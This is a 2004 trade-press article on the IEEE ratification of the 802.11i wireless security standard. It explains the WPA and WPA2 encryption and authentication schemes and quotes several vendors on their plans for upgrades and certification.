Would-be WEP crackers can pack their bags and go home. The long-awaited 802.11i standard WLAN enhancement for Robust
Security Networks (RSNs) has finally arrived, coming to a store near you this September.
On June 30, 2004, the IEEE formally ratified this standard amendment, applicable to 802.11a, b, and g WLANs. According to Frank Hanzlik, Managing Director of the Wi-Fi Alliance, preliminary testing of products that incorporate 802.11i is well underway.
"We go through multiple rounds of plug fests, which is what we call our interoperability tests," said Hanzlik. "We just completed one recently and, based on those results, it looks like we'll be good to go to start certifying products in early September." Products that pass these new tests, extensions of the existing Wi-Fi Protected Access (WPA) program, will wear the brand WPA2."
WPA vs. WPA2WPA
WPA uses the same RC4 cipher as WEP, but in a more secure fashion. In WPA, the Temporal Key Integrity Protocol (TKIP) largely eliminates risk of key cracking, and a Message Integrity Check (MIC) prevents undetected modification. This approach, designed for legacy equipment, is an option in the final 802.11i standard.
WPA2 adds the Advanced Encryption Standard (AES), a stronger, more efficient cipher designed for newer hardware. WPA2 employs AES in Counter mode with CBC-MAC (CCM), creating a new encapsulation protocol, CCMP. Devices are Robust Security Network association (RSNA) capable if they implement CCMP or TKIP, although CCMP is required for full compliance with the 802.11i standard.
WPA supports only Infrastructure mode: WLANs composed of stations communicating through an Access Point (AP). WPA2 adds support for Ad Hoc mode: stations communicating with each other as peers.
This difference is due to authentication. WPA uses a 4-way handshake to control access and deliver a Pairwise Master Key (PMK) used to derive dynamic crypto keys. There are two alternatives:
- WPA-Personal uses a group passphrase, or Preshared Key (PSK), as its PMK. Any station with the passphrase can join the WLAN. To avoid compromise, the PSK should be long (12+ characters) and protected like any password.
- WPA-Enterprise starts with an individual user's identity and goes through a lengthy 802.1X Port Access Control and Extensible Authentication Protocol (EAP) exchange. Individual authentication is better for businesses, but requires complex infrastructure, including a RADIUS server, a user database or certificate authority, and a safe, cost-effective way to distribute user credentials.
The final 802.11i standard (and therefore WPA2) extends this handshake so that either method can be used in a peer-to-peer environment. Better yet, 802.11i/WPA2 adds PMK caching and pre-authentication to reduce the delay caused by 802.1X.
After a station has completed full authentication, it may use a cached PMK to skip re-authentication when roaming between APs. Stations can also initiate pre-authentication with a new AP when roaming appears likely. According to Trapeze Networks, caching slashes handoff from 800 ms to as little as 25 ms. This is very important to delay-sensitive applications like VoIP over Wi-Fi.
According to Hanzlik, products should be announced in September, at the start of certification. "We start about six months before the certification program is done, going through repeated interoperability tests to work out the kinks in our test bed. That's why we can say with good confidence that the first batch of products will show up around the same time as certification starts." The WPA2 test bed includes a mixture of end products and platforms (chips used in such products).
I queried vendors regarding their plans for 802.11i support and WPA2 certification. Several (3COM, Apple, Buffalo) declined to comment before making formal product announcements. But others offered comments that suggest aggressive plans for rapid support. For example:
- SMC spokesperson Betty Chan said, "Most of SMC's 802.11g and 802.11a/g products will be upgradeable with 802.11i by September. All new products will include 802.11i."
- Melody Chalaban, Public Relations Manager, Belkin Corporation, said "Broadcom is already rolling 802.11i into their driver software. We are beginning the implementation in our drivers and software. We will be able to upgrade end users via firmware and software around [September, when WPA2 certification starts]."
- Linda Horiuchi, PR manager for wireless/mobility, said that Cisco plans to support IEEE 802.11i in Cisco Aironet products. "As an example, the IEEE 802.11g radios for existing Cisco Aironet 1200 and 1100 Series Access Points and Aironet 1300 Series Outdoor AP and Wireless Bridge have hardware accelerators for AES, so 802.11i will be a software upgrade available in Q4," wrote Horiuchi.
- Jenni Adair, Director of Public Relations at Trapeze Networks, said, "We already support in shipping product all of the major security sub-components including WPA/TKIP and WPA2/AES. We will have full 802.11i compliance in Q4 of this year which will entail a simple software upgrade."
- Carl Blume, Director of Product Marketing. said that Colubris Networks will roll-out 802.11i and WPA2 across its entire line of a/b/g products in Q4. Those products, introduced in January 2004, already support AES encryption. "All [are] software upgradeable to 802.11i and WPA2. Precise availability dates will vary by product and certification schedules in the Wi-Fi Alliance testing labs," said Blume. Customers with service subscriptions will download new software from Colubris.
- Airespace's Jeff Aaron told me that his company's products already support the 802.11i standard. "We are on track to be [among] the first vendors to complete official Wi-Fi Alliance certification for 802.11i," said Aaron. "802.11i comes standard with our latest software release, which has just begun shipping to customers. There is no cost to upgrade to this software version."
Preparing to upgradedoes
There's also a difference between 802.11i support and WPA2 certification. Draft 10 of 802.11i has been available since April, giving many vendors time to implement and test prior to formal IEEE ratification. However, products can comply with standards but still encounter interoperability issues in the field.
"We see standards compliance as necessary but not sufficient. If that wasn't true, we'd be doing certification right now," said Hanzlik. "We're still wrapping up interoperability issues found during earlier plug fests. That suggest to us that there were issues in earlier products that need to be addressed." Products that include 802.11i today may still have interoperability issues that will be detected and resolved during certification testing.
Hanzlik believes that certification is more important now than ever due to increasing complexity. "Buyers developing RFPs for Wi-Fi products [should] include a checkbox for WPA2 certification to make sure the products that show up in their organizations will interoperate," advised Hanzlik. "There have been cases in the past where pre-standard implementations didn't quite work together."
Any consumer purchasing Wi-Fi products today should seek out vendors that will commit to fully supporting 802.11i and completing WPA2 certification. Whenever possible, purchase hardware that already supports AES and make sure that firmware upgrades will be freely-available under your warranty or support plan. Once certification starts, check the Wi-Fi Alliance Web site for a current list of WPA2 products.
Today, Wi-Fi products require WPA support. Eventually, Wi-Fi products may require WPA2 support. "With WPA, we had a strong motivation to make that technology mandatory because of concern over legacy WEP. For WPA2, there's still time to consider when we'll make it mandatory," said Hanzlik. "There are some customers that will be satisfied with WPA and others that will need WPA2. So we'll keep WPA2 as an option in the beginning and let the market decide whether to make it mandatory in the future."